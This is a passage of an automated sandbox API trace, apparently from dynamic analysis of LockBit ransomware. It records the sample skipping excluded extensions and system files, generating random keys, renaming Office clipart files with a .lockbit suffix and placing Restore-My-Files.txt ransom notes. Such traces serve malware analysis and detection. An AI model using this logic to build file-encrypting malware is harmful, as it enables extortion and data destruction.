cAlternateFileName="")) returned 1 [0109.649] lstrcmpiW (lpString1=".", lpString2="BS01603_.WMF") returned -1 [0109.649] lstrcmpiW (lpString1="..", lpString2="BS01603_.WMF") returned -1 [0109.649] PathFindExtensionW (pszPath="BS01603_.WMF") returned=".WMF" [0109.649] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.649] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.649] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.649] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.650] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.651] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.651] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.652] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.652] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.652] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.652] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.652] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS01603_.WMF") returned 1 [0109.652] lstrcmpiW (lpString1="ntldr", lpString2="BS01603_.WMF") returned 1 [0109.652] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS01603_.WMF") returned 1 [0109.652] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS01603_.WMF") returned -1 [0109.652] lstrcmpiW (lpString1="autorun.inf", lpString2="BS01603_.WMF") returned -1 [0109.652] lstrcmpiW (lpString1="thumbs.db", lpString2="BS01603_.WMF") returned 1 [0109.652] lstrcmpiW (lpString1="iconcache.db", lpString2="BS01603_.WMF") returned 1 [0109.652] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.652] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned=".WMF" [0109.652] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.652] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.652] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.652] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.652] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.652] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.652] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.653] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.654] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.654] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.lockbit") returned 72 [0109.654] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0109.658] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.658] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.658] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7176) returned 1 [0109.658] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.659] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.660] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.660] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.665] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.665] malloc (_Size=0xa6) returned 0x77d800 [0109.665] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.666] free (_Block=0x77d800) [0109.666] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.666] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.666] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.666] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc31ccd00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc31ccd00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0xda6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS01634_.WMF", cAlternateFileName="")) returned 1 [0109.666] lstrcmpiW (lpString1=".", lpString2="BS01634_.WMF") returned -1 [0109.666] lstrcmpiW (lpString1="..", lpString2="BS01634_.WMF") returned -1 [0109.666] PathFindExtensionW (pszPath="BS01634_.WMF") returned=".WMF" [0109.666] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.666] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.666] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.666] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.667] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.668] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.668] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.669] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.669] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.669] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.669] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS01634_.WMF") returned 1 [0109.669] lstrcmpiW (lpString1="ntldr", lpString2="BS01634_.WMF") returned 1 [0109.669] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS01634_.WMF") returned 1 [0109.669] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS01634_.WMF") returned -1 [0109.669] lstrcmpiW (lpString1="autorun.inf", lpString2="BS01634_.WMF") returned -1 [0109.669] lstrcmpiW (lpString1="thumbs.db", lpString2="BS01634_.WMF") returned 1 [0109.669] lstrcmpiW (lpString1="iconcache.db", lpString2="BS01634_.WMF") returned 1 [0109.669] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.669] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned=".WMF" [0109.669] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.669] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.669] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.669] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.669] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.669] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.669] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.669] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.670] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.671] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.lockbit") returned 72 [0109.671] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.671] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.671] malloc (_Size=0x40068) returned 0x3e70008 [0109.671] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=3494) returned 1 [0109.672] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.672] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0109.672] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.673] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0109.673] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0109.701] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.701] malloc (_Size=0xa6) returned 0x77d800 [0109.701] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.702] free (_Block=0x77d800) [0109.702] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.702] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.702] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.702] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63bebd00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x63bebd00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3a94, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS01635_.WMF", cAlternateFileName="")) returned 1 [0109.702] lstrcmpiW (lpString1=".", lpString2="BS01635_.WMF") returned -1 [0109.702] lstrcmpiW (lpString1="..", lpString2="BS01635_.WMF") returned -1 [0109.702] PathFindExtensionW (pszPath="BS01635_.WMF") returned=".WMF" [0109.702] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.702] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.702] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.702] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.702] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.702] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.702] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.703] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.703] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS01635_.WMF") returned 1 [0109.704] lstrcmpiW (lpString1="ntldr", lpString2="BS01635_.WMF") returned 1 [0109.704] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS01635_.WMF") returned 1 [0109.704] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS01635_.WMF") returned -1 [0109.704] lstrcmpiW (lpString1="autorun.inf", lpString2="BS01635_.WMF") returned -1 [0109.704] lstrcmpiW (lpString1="thumbs.db", lpString2="BS01635_.WMF") returned 1 [0109.704] lstrcmpiW (lpString1="iconcache.db", lpString2="BS01635_.WMF") returned 1 [0109.704] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.704] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned=".WMF" [0109.704] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.704] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.704] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".sqlite3", 